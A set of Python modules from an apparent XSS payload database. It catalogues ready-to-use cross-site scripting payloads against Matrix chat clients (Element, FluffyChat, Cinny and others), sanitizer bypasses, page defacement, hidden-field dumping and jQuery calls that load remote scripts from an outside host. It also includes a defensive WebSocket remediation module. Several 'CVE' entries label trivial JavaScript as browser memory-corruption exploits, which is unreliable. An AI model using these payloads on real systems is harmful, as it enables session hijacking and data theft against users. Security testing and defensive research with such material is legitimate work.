        payload="<video onloadstart=alert(1)><source>",
        contexts=["html_content"],
        tags=["brutelogic", "video"],
        severity="high",
        cvss_score=7.5,
        description="Video loadstart",
        reliability="high",
    ),
    "bl2020_media_003": PayloadEntry(
        payload="<video ontimeupdate=alert(1) controls src=//brutelogic.com.br/x.mp4>",
        contexts=["html_content"],
        tags=["brutelogic", "video"],
        severity="high",
        cvss_score=7.5,
        description="Video timeupdate",
        reliability="medium",
    ),
    # ===== INNERHTML CLOBBER =====
    "bl2020_clobber_001": PayloadEntry(
        payload="documentElement.innerHTML='<h1>Not Found</h1>'",
        contexts=["javascript"],
        tags=["brutelogic", "innerHTML", "defacement"],
        severity="high",
        cvss_score=7.5,
        description="Document defacement",
        reliability="high",
    ),
    # ===== BASE HREF =====
    "bl2020_base_001": PayloadEntry(
        payload="<base href=//knoxss.me>",
        contexts=["html_content"],
        tags=["brutelogic", "base", "hijack"],
        severity="high",
        cvss_score=7.5,
        description="Base href hijack",
        reliability="high",
    ),
    # ===== LINK STYLESHEET =====
    "bl2020_link_001": PayloadEntry(
        payload="<link rel=stylesheet href=//HOST/FILE>",
        contexts=["html_content"],
        tags=["brutelogic", "link", "css"],
        severity="medium",
        cvss_score=6.0,
        description="External stylesheet",
        reliability="high",
    ),
    "bl2020_link_002": PayloadEntry(
        payload="<link rel=stylesheet href=data:text/css,CSS>",
        contexts=["html_content"],
        tags=["brutelogic", "link", "data"],
        severity="medium",
        cvss_score=6.0,
        description="Data URI stylesheet",
        reliability="high",
    ),
    # ===== JAVASCRIPT LOCATION TRICKS =====
    "bl2020_loc_001": PayloadEntry(
        payload="<j/onmouseover=location=innerHTML>javascript:alert(1)//",
        contexts=["html_content"],
        tags=["brutelogic", "location", "innerHTML"],
        severity="high",
        cvss_score=7.5,
        description="Location via innerHTML",
        reliability="high",
    ),
    "bl2020_loc_002": PayloadEntry(
        payload="<iframe id=t:alert(1) name=javascrip onload=location=name+id>",
        contexts=["html_content"],
        tags=["brutelogic", "location", "iframe"],
        severity="high",
        cvss_score=7.5,
        description="Location via name+id",
        reliability="high",
    ),
    # ===== SVG ID INJECTION =====
    "bl2020_svgid_001": PayloadEntry(
        payload="<svg id=<img/src/onerror&#61alert(1)&gt; onload=head.innerHTML=id>",
        contexts=["html_content", "svg"],
        tags=["brutelogic", "svg", "innerHTML"],
        severity="high",
        cvss_score=7.5,
        description="SVG id injection",
        reliability="medium",
    ),
    "bl2020_svgid_002": PayloadEntry(
        payload="<svg id=<img/src/onerror&#61alert(1)&gt; onload=body.outerHTML=id>",
        contexts=["html_content", "svg"],
        tags=["brutelogic", "svg", "outerHTML"],
        severity="high",
        cvss_score=7.5,
        description="SVG outerHTML injection",
        reliability="medium",
    ),
    # ===== JQUERY GETSCRIPT =====
    "bl2020_jq_001": PayloadEntry(
        payload="onload=function(){$.getScript('//brutelogic.com.br/2.js')}",
        contexts=["html_attribute"],
        tags=["brutelogic", "jquery", "getScript"],
        severity="high",
        cvss_score=7.5,
        description="jQuery getScript onload",
        reliability="high",
    ),
    "bl2020_jq_002": PayloadEntry(
        payload="onload=x=>$.getScript('//brutelogic.com.br/2.js')",
        contexts=["html_attribute"],
        tags=["brutelogic", "jquery", "arrow"],
        severity="high",
        cvss_score=7.5,
        description="jQuery getScript arrow",
        reliability="high",
    ),
    # ===== SHAKE EFFECT =====
    "bl2020_shake_001": PayloadEntry(
        payload="setInterval(x=>{b=document.body.style,b.marginTop=(b.marginTop=='4px')?'-4px':'4px';},5)",
        contexts=["javascript"],
        tags=["brutelogic", "effect", "shake"],
        severity="low",
        cvss_score=3.0,
        description="Page shake effect",
        reliability="high",
    ),
    # ===== HIDDEN FORM FIELDS =====
    "bl2020_hidden_001": PayloadEntry(
        payload="f=document.forms;for(i=0;i<f.length;i++){e=f[i].elements;for(n in e){if(e[n].type=='hidden'){alert(e[n].name+': '+e[n].value)}}}",
        contexts=["javascript"],
        tags=["brutelogic", "form", "hidden"],
        severity="medium",
        cvss_score=5.0,
        description="Dump hidden fields",
        reliability="high",
    ),
    # ===== UNIVERSAL POLYGLOT =====
    "bl2020_universal_001": PayloadEntry(
        payload="</Script/\"'--><Body /Autofocus /OnFocus = confirm`1` <!-->",
        contexts=["html_content", "javascript", "html_attribute"],
        tags=["brutelogic", "polyglot", "universal"],
        severity="high",
        cvss_score=7.5,
        description="Universal XSS polyglot",
        reliability="high",
    ),
}

BRS_KB_BRUTELOGIC_2020_TOTAL = len(BRS_KB_BRUTELOGIC_2020_DATABASE)



# Project: BRS-KB
# Company: EasyProTech LLC (www.easypro.tech)
# Dev: Brabus
# Date: 2025-12-26 UTC
# Status: Created
# Telegram: https://t.me/EasyProTech

"""
Matrix Clients XSS Payloads

Client-specific attack vectors for Matrix ecosystem.
Covers Element, FluffyChat, Cinny, Nheko, and other clients.

Profile: matrix-clients
"""

from ..models import PayloadEntry


BRS_KB_MATRIX_CLIENTS_PAYLOADS = {
    # ============================================================
    # ELEMENT WEB/DESKTOP
    # ============================================================
    "matrix-element-rageshake": PayloadEntry(
        payload='user_id="><script>alert(1)</script>&app=element-web',
        contexts=["url", "matrix"],
        severity="high",
        cvss_score=7.5,
        description="Element rageshake/bugreport XSS",
        tags=["element", "rageshake", "bugreport"],
        bypasses=["rageshake_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="Element-specific / rageshake",
        known_affected=["element-web<=1.11.x"],
        profile="matrix-clients",
    ),
    "matrix-element-permalink": PayloadEntry(
        payload="https://app.element.io/#/room/!<script>alert(1)</script>:server",
        contexts=["url", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="Element permalink room ID XSS",
        tags=["element", "permalink", "room"],
        bypasses=["permalink_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
        attack_surface="client",
        spec_ref="Element-specific / permalinks",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-deeplink": PayloadEntry(
        payload='element://vector/webapp/#/room/!"><script>alert(1)</script>',
        contexts=["url", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="Element desktop deep linking XSS",
        tags=["element", "deeplink", "desktop"],
        bypasses=["deeplink_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="Element-specific / deep linking",
        known_affected=["element-desktop"],
        profile="matrix-clients",
    ),
    "matrix-element-jitsi-domain": PayloadEntry(
        payload='{"type":"jitsi","content":{"domain":"<script>alert(1)</script>","conferenceId":"x"}}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="Element Jitsi widget domain XSS",
        tags=["element", "jitsi", "widget", "domain"],
        bypasses=["jitsi_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="widget",
        spec_ref="Element-specific / Jitsi integration",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-widget-url": PayloadEntry(
        payload='{"type":"im.vector.modular.widgets","state_key":"widget_id","content":{"type":"customwidget","url":"javascript:alert(1)","name":"XSS"}}',
        contexts=["json", "matrix"],
        severity="critical",
        cvss_score=9.5,
        description="Element widget URL javascript: XSS",
        tags=["element", "widget", "url", "javascript"],
        bypasses=["widget_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
        attack_surface="widget",
        spec_ref="im.vector.modular.widgets",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-widget-name": PayloadEntry(
        payload='{"type":"im.vector.modular.widgets","state_key":"widget_id","content":{"type":"customwidget","url":"https://x","name":"<img src=x onerror=alert(1)>"}}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="Element widget name XSS",
        tags=["element", "widget", "name"],
        bypasses=["widget_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
        attack_surface="widget",
        spec_ref="im.vector.modular.widgets",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-widget-data": PayloadEntry(
        payload='{"type":"im.vector.modular.widgets","state_key":"widget_id","content":{"type":"customwidget","url":"https://x","data":{"title":"<script>alert(1)</script>"}}}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=7.5,
        description="Element widget data XSS",
        tags=["element", "widget", "data"],
        bypasses=["widget_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="widget",
        spec_ref="im.vector.modular.widgets",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-scalar-token": PayloadEntry(
        payload='scalar_token="><script>alert(1)</script>&room_id=!x:server',
        contexts=["url", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="Element Scalar integration token XSS",
        tags=["element", "scalar", "integration", "token"],
        bypasses=["integration_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="integration",
        spec_ref="Element-specific / Scalar",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-sso-redirect": PayloadEntry(
        payload="/_matrix/client/v3/login/sso/redirect?redirectUrl=javascript:alert(1)",
        contexts=["url", "matrix"],
        severity="critical",
        cvss_score=9.0,
        description="Element SSO redirect XSS",
        tags=["element", "sso", "redirect", "auth"],
        bypasses=["redirect_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="SSO / redirectUrl",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-login-fallback": PayloadEntry(
        payload="/_matrix/client/v3/login/fallback?redirectUrl=javascript:alert(document.domain)",
        contexts=["url", "matrix"],
        severity="critical",
        cvss_score=9.0,
        description="Element login fallback redirect XSS",
        tags=["element", "login", "fallback", "redirect"],
        bypasses=["redirect_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="Login fallback / redirectUrl",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-notification": PayloadEntry(
        payload='{"notification":{"room_name":"<script>alert(1)</script>","sender_display_name":"attacker","content":{"body":"msg"}}}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="Element push notification room_name XSS",
        tags=["element", "notification", "push"],
        bypasses=["notification_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="push",
        spec_ref="Push notifications",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-search-highlight": PayloadEntry(
        payload='{"search_categories":{"room_events":{"highlights":["<script>alert(1)</script>"]}}}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=7.5,
        description="Element search highlight XSS",
        tags=["element", "search", "highlight"],
        bypasses=["search_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="/_matrix/client/v3/search",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-code-language": PayloadEntry(
        payload='<pre><code class="language-"><script>alert(1)</script>">code</code></pre>',
        contexts=["html_content", "matrix"],
        severity="high",
        cvss_score=7.5,
        description="Element code block language class XSS",
        tags=["element", "code", "language", "highlight"],
        bypasses=["code_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="org.matrix.custom.html / code blocks",
        known_affected=None,
        profile="matrix-clients",
    ),
    "matrix-element-latex-href": PayloadEntry(
        payload="$\\href{javascript:alert(1)}{click}$",
        contexts=["markdown", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="Element LaTeX \\href command XSS",
        tags=["element", "latex", "href", "katex"],
        bypasses=["latex_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
        attack_surface="client",
        spec_ref="Element-specific / KaTeX",
        known_affected=None,
        profile="matrix-clients",
    ),
    # ============================================================
    # FLUFFYCHAT
    # ============================================================
    "matrix-fluffychat-sticker": PayloadEntry(
        payload='{"msgtype":"m.sticker","body":"<img src=x onerror=alert(1)>","url":"mxc://x/y","info":{"thumbnail_url":"mxc://x/y"}}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=7.5,
        description="FluffyChat sticker body XSS",
        tags=["fluffychat", "sticker", "body"],
        bypasses=["sticker_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="m.sticker",
        known_affected=["fluffychat"],
        profile="matrix-clients",
    ),
    "matrix-fluffychat-displayname": PayloadEntry(
        payload='{"displayname":"<svg onload=alert(1)>"}',
        contexts=["json", "matrix"],
        severity="critical",
        cvss_score=9.0,
        description="FluffyChat displayname XSS",
        tags=["fluffychat", "displayname"],
        bypasses=["displayname_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
        attack_surface="client",
        spec_ref="m.room.member",
        known_affected=["fluffychat"],
        profile="matrix-clients",
    ),
    "matrix-fluffychat-room-name": PayloadEntry(
        payload='{"name":"<img src=x onerror=alert(1)>"}',
        contexts=["json", "matrix"],
        severity="critical",
        cvss_score=9.0,
        description="FluffyChat room name XSS",
        tags=["fluffychat", "room", "name"],
        bypasses=["state_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
        attack_surface="client",
        spec_ref="m.room.name",
        known_affected=["fluffychat"],
        profile="matrix-clients",
    ),
    # ============================================================
    # CINNY
    # ============================================================
    "matrix-cinny-markdown-html": PayloadEntry(
        payload="```html\n<script>alert(1)</script>\n```",
        contexts=["markdown", "matrix"],
        severity="high",
        cvss_score=7.5,
        description="Cinny code block HTML language XSS",
        tags=["cinny", "markdown", "code", "html"],
        bypasses=["code_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
        attack_surface="client",
        spec_ref="Cinny-specific / markdown",
        known_affected=["cinny<=4.x"],
        profile="matrix-clients",
    ),
    "matrix-cinny-custom-emoji": PayloadEntry(
        payload='{"shortcode":"<img src=x onerror=alert(1)>","url":"mxc://x/y"}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=7.5,
        description="Cinny custom emoji shortcode XSS",
        tags=["cinny", "emoji", "shortcode"],
        bypasses=["emoji_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="im.ponies.room_emotes",
        known_affected=["cinny"],
        profile="matrix-clients",
    ),
    "matrix-cinny-room-topic": PayloadEntry(
        payload='{"topic":"<svg onload=alert(1)>"}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="Cinny room topic XSS",
        tags=["cinny", "room", "topic"],
        bypasses=["state_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
        attack_surface="client",
        spec_ref="m.room.topic",
        known_affected=["cinny"],
        profile="matrix-clients",
    ),
    # ============================================================
    # NHEKO
    # ============================================================
    "matrix-nheko-notification": PayloadEntry(
        payload='{"sender":"@<script>alert(1)</script>:server","content":{"body":"msg"}}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=7.5,
        description="Nheko notification sender XSS",
        tags=["nheko", "notification", "sender"],
        bypasses=["notification_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
        attack_surface="client",
        spec_ref="Push notifications",
        known_affected=["nheko"],
        profile="matrix-clients",
    ),
    "matrix-nheko-reply-preview": PayloadEntry(
        payload='{"m.relates_to":{"m.in_reply_to":{"event_id":"$<script>alert(1)</script>"}}}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=7.5,
        description="Nheko reply preview event ID XSS",
        tags=["nheko", "reply", "event_id"],
        bypasses=["reply_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
        attack_surface="client",
        spec_ref="m.relates_to / m.in_reply_to",
        known_affected=["nheko"],
        profile="matrix-clients",
    ),
    # ============================================================
    # HYDROGEN
    # ============================================================
    "matrix-hydrogen-timeline": PayloadEntry(
        payload='{"content":{"body":"x","format":"org.matrix.custom.html","formatted_body":"<img src=x onerror=alert(1)>"}}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="Hydrogen timeline message XSS",
        tags=["hydrogen", "timeline", "message"],
        bypasses=["matrix_sanitizer"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
        attack_surface="client",
        spec_ref="m.room.message",
        known_affected=["hydrogen"],
        profile="matrix-clients",
    ),
    # ============================================================
    # SCHILDICHAT
    # ============================================================
    "matrix-schildichat-bubble": PayloadEntry(
        payload='{"content":{"format":"org.matrix.custom.html","formatted_body":"<svg onload=alert(1)>"}}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="SchildiChat message bubble XSS",
        tags=["schildichat", "bubble", "message"],
        bypasses=["matrix_sanitizer"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
        attack_surface="client",
        spec_ref="m.room.message",
        known_affected=["schildichat"],
        profile="matrix-clients",
    ),
    # ============================================================
    # FRACTAL
    # ============================================================
    "matrix-fractal-message": PayloadEntry(
        payload='{"formatted_body":"<img src=x onerror=alert(1)>"}',
        contexts=["json", "matrix"],
        severity="high",
        cvss_score=8.0,
        description="Fractal message body XSS",
        tags=["fractal", "message"],
        bypasses=["matrix_sanitizer"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
        attack_surface="client",
        spec_ref="m.room.message",
        known_affected=["fractal"],
        profile="matrix-clients",
    ),
    # ============================================================
    # QUATERNION
    # ============================================================
    "matrix-quaternion-html": PayloadEntry(
        payload='<a href="javascript:alert(1)">click</a>',
        contexts=["html_content", "matrix"],
        severity="high",
        cvss_score=7.5,
        description="Quaternion HTML link XSS",
        tags=["quaternion", "html", "link"],
        bypasses=["matrix_sanitizer"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="org.matrix.custom.html",
        known_affected=["quaternion"],
        profile="matrix-clients",
    ),
    # ============================================================
    # MATRIX-REACT-SDK COMMON
    # ============================================================
    "matrix-react-sdk-sanitizer-bypass": PayloadEntry(
        payload="<math><mtext><table><mglyph><style><img src=x onerror=alert(1)>",
        contexts=["html_content", "matrix"],
        severity="critical",
        cvss_score=9.0,
        description="matrix-react-sdk DOMPurify mXSS bypass",
        tags=["matrix-react-sdk", "dompurify", "mxss"],
        bypasses=["dompurify", "matrix_sanitizer"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="matrix-react-sdk / sanitization",
        known_affected=["element-web", "schildichat"],
        profile="matrix-clients",
    ),
    "matrix-react-sdk-namespace": PayloadEntry(
        payload='<svg><p><style><g title="</style><img src onerror=alert(1)>">',
        contexts=["html_content", "matrix"],
        severity="critical",
        cvss_score=9.0,
        description="matrix-react-sdk namespace confusion",
        tags=["matrix-react-sdk", "namespace", "mxss"],
        bypasses=["dompurify", "matrix_sanitizer"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
        attack_surface="client",
        spec_ref="matrix-react-sdk / sanitization",
        known_affected=["element-web"],
        profile="matrix-clients",
    ),
}

BRS_KB_MATRIX_CLIENTS_TOTAL_PAYLOADS = len(BRS_KB_MATRIX_CLIENTS_PAYLOADS)



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-04 19:21:27 UTC
Status: Created
Telegram: https://t.me/easyprotech

Cross-Site Scripting (XSS) in WebSocket Context Context - Data Module
Contains description and remediation data
"""

DESCRIPTION = """
WebSocket XSS occurs when user input is reflected into WebSocket messages without proper sanitization.
WebSockets provide full-duplex communication channels over a single TCP connection, making them ideal
for real-time applications. However, when untrusted data is transmitted through WebSocket messages
and then reflected back to clients or processed by JavaScript, it creates critical XSS vulnerabilities.

VULNERABILITY CONTEXT:
WebSocket XSS typically happens when:
1. Server echoes user messages without sanitization
2. Real-time chat applications display messages from other users
3. Collaborative applications broadcast user input
4. Gaming platforms transmit player actions
5. Live commenting systems
6. Real-time notifications
7. Multi-user editing platforms
8. Stock trading applications
9. IoT device communication

Common in:
- Real-time chat applications
- Online gaming platforms
- Collaborative editors (Google Docs, Notion)
- Live commenting systems
- Multiplayer games
- Stock trading platforms
- Social media live feeds
- IoT dashboards
- Team communication tools

SEVERITY: HIGH
WebSocket XSS allows real-time code execution across all connected clients, potentially affecting
multiple users simultaneously. The real-time nature makes detection and response challenging.
"""

REMEDIATION = r"""
WEBSOCKET XSS DEFENSE STRATEGY:

1. MESSAGE SANITIZATION (PRIMARY DEFENSE):
   Sanitize all outbound WebSocket messages:

   Node.js Example:
   const DOMPurify = require('dompurify');
   const cleanMessage = DOMPurify.sanitize(message);

   Python (websockets library):
   import bleach
   clean_message = bleach.clean(message, tags=[], strip=True)

   Java Example:
   String cleanMessage = Jsoup.clean(message, Safelist.none());

2. JSON SCHEMA VALIDATION:
   Define strict message schemas:

   Schema validation:
   {
     "type": "object",
     "properties": {
       "type": {"type": "string", "enum": ["chat", "join", "leave"]},
       "message": {"type": "string", "maxLength": 500}
     },
     "required": ["type"],
     "additionalProperties": false
   }

3. ESCAPE USER-GENERATED CONTENT:
   HTML escape all user content:

   JavaScript:
   function escapeHtml(text) {
     const map = {'&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;'};
     return text.replace(/[&<>"']/g, m => map[m]);
   }

   Python:
   import html
   safe_content = html.escape(user_content)

4. CONTENT SECURITY POLICY (CSP):
   Enhanced CSP for WebSocket applications:

   Content-Security-Policy:
     default-src 'self';
     script-src 'self' 'nonce-{random}';
     connect-src 'self' wss: ws:;
     object-src 'none';
     base-uri 'none';

5. INPUT VALIDATION AND LENGTH LIMITS:
   Implement strict input validation:

   Maximum message length: 500 characters
   Whitelist allowed characters: alphanumeric, basic punctuation
   Block: < > & " ' and other dangerous characters
   Rate limiting: max 10 messages per minute per user

6. MESSAGE TYPE ENFORCEMENT:
   Only allow predefined message types:

   ALLOWED_TYPES = ['chat', 'join', 'leave', 'typing', 'file']
   if (!ALLOWED_TYPES.includes(message.type)) {
     ws.close(1008, 'Invalid message type');
   }

7. ORIGIN VALIDATION:
   Validate WebSocket connection origin:

   ws.on('connection', (socket, request) => {
     const origin = request.headers.origin;
     const allowedOrigins = ['https://yourdomain.com', 'https://app.yourdomain.com'];

     if (!allowedOrigins.includes(origin)) {
       socket.close(1008, 'Origin not allowed');
       return;
     }
   });

8. AUTHENTICATION AND AUTHORIZATION:
   Require authentication for WebSocket connections:

   JWT-based authentication:
   const token = socket.handshake.auth.token;
   try {
     const decoded = jwt.verify(token, SECRET);
     socket.userId = decoded.userId;
   } catch (err) {
     socket.close(1008, 'Authentication failed');
   }

9. RATE LIMITING AND THROTTLING:
   Implement connection and message rate limiting:

   Redis-based rate limiting:
   const rateLimit = await redis.incr(`ws:${userId}:messages`);
   if (rateLimit > 10) {
     socket.close(1008, 'Rate limit exceeded');
     return;
   }

10. SECURE WEBSOCKET CONFIGURATION:
    Server configuration:

    HTTPS only (WSS):
    wss://yourdomain.com/ws

    Secure headers:
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY

11. MESSAGE QUEUE SANITIZATION:
    If using message queues (Redis, RabbitMQ):

    Redis example:
    const cleanMessage = validator.escape(message);
    await redis.lpush('messages', cleanMessage);

12. CLIENT-SIDE VALIDATION:
    Validate messages on client side too:

    function validateMessage(message) {
      const maxLength = 500;
      const allowedPattern = /^[a-zA-Z0-9\s.,!?-]+$/;

      return message.length <= maxLength && allowedPattern.test(message);
    }

13. LOGGING AND MONITORING:
    Comprehensive logging:

    Log all WebSocket messages:
    logger.info('WS Message', {
      userId: socket.userId,
      message: message,
      timestamp: new Date().toISOString()
    });

    Monitor for suspicious patterns:
    if (message.includes('<script>')) {
      logger.warn('Potential XSS attempt', { userId, message });
    }

14. ERROR HANDLING:
    Proper error handling without information disclosure:

    ws.on('error', (error) => {
      logger.error('WebSocket error', { error: error.message });
      // Don't send error details to client
    });

15. REGULAR SECURITY TESTING:
    Include WebSocket testing in security assessments:

    Automated testing:
    - Send XSS payloads via WebSocket
    - Monitor for script execution
    - Test rate limiting
    - Validate authentication

    Manual testing:
    - Use browser dev tools WebSocket inspector
    - Test with various XSS payloads
    - Verify proper sanitization

16. DEPLOYMENT SECURITY:
    WebSocket-specific deployment considerations:

    Load balancer configuration:
    - Sticky sessions for WebSocket connections
    - Proper timeout settings
    - DDoS protection

    Container security:
    - Resource limits for WebSocket services
    - Network policies
    - Service mesh integration

SECURITY TESTING PAYLOADS:

Basic detection:
<script>alert('WebSocket XSS')</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Filter bypass:
<ScRiPt>alert(1)</ScRiPt>
<img/src=x onerror=alert`1`>
<svg/onload=alert(1)>

Advanced payloads:
{{constructor.constructor('alert(1)')()}}
javascript:alert(1)
data:text/html,<script>alert(1)</script>

WEBSOCKET SECURITY HEADERS:

Sec-WebSocket-Key: (auto-generated)
Sec-WebSocket-Version: 13
Sec-WebSocket-Protocol: chat
Sec-WebSocket-Extensions: (if supported)

MONITORING AND ALERTS:

Set up alerts for:
- High message frequency from single user
- Messages containing script tags
- Failed authentication attempts
- Unusual connection patterns

OWASP REFERENCES:
- OWASP WebSocket Cheat Sheet
- OWASP Testing Guide: Testing WebSockets
- CWE-79: Improper Neutralization of Input
- Real-time Web Application Security
"""



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-04 12:00:00 UTC
Status: Created
Telegram: https://t.me/easyprotech

Validate command
"""

import argparse

from brs_kb import validate_payload_database

from .base import BaseCommand


class ValidateCommand(BaseCommand):
    """Validate payload database integrity"""

    def add_parser(self, subparsers: argparse._SubParsersAction) -> argparse.ArgumentParser:
        """Add parser for validate command"""
        return subparsers.add_parser("validate", help="Validate payload database integrity")

    def execute(self, args: argparse.Namespace) -> int:
        """Execute validate command"""
        try:
            result = validate_payload_database()
            errors = result.get("errors", result.get("issues", []))
            # Check if valid key exists and is explicitly False, or if there are errors
            if "valid" in result and result["valid"] is False:
                print(" Database validation failed")
                if errors:
                    print(f"Issues: {errors}")
                return 1

            if errors:
                print(" Database validation failed")
                print(f"Issues: {errors}")
                return 1

            print(" Database validation passed")
            return 0
        except Exception as e:
            print(f"Error: {e}")
            return 1



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

1-Day XSS Payloads - Part 1
CVE-based exploits and sanitizer bypasses (DOMPurify, js-xss, sanitize-html, Google Caja).
"""

from ..models import PayloadEntry


BRS_KB_1DAY_CVE_PAYLOADS_PART1 = {
    # ============================================================
    # CVE-BASED EXPLOITS
    # ============================================================
    # CVE-2020-6519 - Chrome CSP Bypass
    "cve-2020-6519-csp-bypass": PayloadEntry(
        payload='<iframe src="javascript:alert(origin)">',
        contexts=["html_content", "csp_bypass"],
        severity="critical",
        cvss_score=9.0,
        description="CVE-2020-6519: Chrome CSP bypass via javascript: in iframe",
        tags=["cve", "chrome", "csp", "2020"],
        bypasses=["csp"],
        waf_evasion=True,
        browser_support=["chrome"],
        reliability="medium",
    ),
    # CVE-2019-5786 - Chrome FileReader UAF (memory corruption leading to XSS)
    "cve-2019-5786-filereader": PayloadEntry(
        payload="new FileReader().readAsArrayBuffer(new Blob([alert(1)||'']))",
        contexts=["javascript"],
        severity="high",
        cvss_score=8.0,
        description="CVE-2019-5786: FileReader use-after-free pattern",
        tags=["cve", "chrome", "filereader", "2019"],
        bypasses=["sandbox"],
        waf_evasion=True,
        browser_support=["chrome"],
        reliability="low",
    ),
    # CVE-2021-21224 - V8 Type Confusion
    "cve-2021-21224-v8": PayloadEntry(
        payload="({})[-1]=alert(1)",
        contexts=["javascript"],
        severity="high",
        cvss_score=8.0,
        description="CVE-2021-21224: V8 type confusion pattern",
        tags=["cve", "v8", "type-confusion", "2021"],
        bypasses=["sandbox"],
        waf_evasion=True,
        browser_support=["chrome"],
        reliability="low",
    ),
    # CVE-2020-15999 - FreeType Heap Buffer Overflow
    "cve-2020-15999-freetype": PayloadEntry(
        payload='<svg><text style="font-family:x" onload="alert(1)">',
        contexts=["html_content", "svg"],
        severity="high",
        cvss_score=8.0,
        description="CVE-2020-15999: FreeType font processing vector",
        tags=["cve", "freetype", "font", "2020"],
        bypasses=["svg_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox"],
        reliability="low",
    ),
    # CVE-2021-30551 - V8 Type Confusion in Map
    "cve-2021-30551-map": PayloadEntry(
        payload="new Map([[{},alert]])",
        contexts=["javascript"],
        severity="high",
        cvss_score=8.0,
        description="CVE-2021-30551: V8 Map type confusion",
        tags=["cve", "v8", "map", "2021"],
        bypasses=["sandbox"],
        waf_evasion=True,
        browser_support=["chrome"],
        reliability="low",
    ),
    # CVE-2022-1096 - V8 Type Confusion
    "cve-2022-1096-v8": PayloadEntry(
        payload="Array.prototype.constructor=function(){alert(1)}",
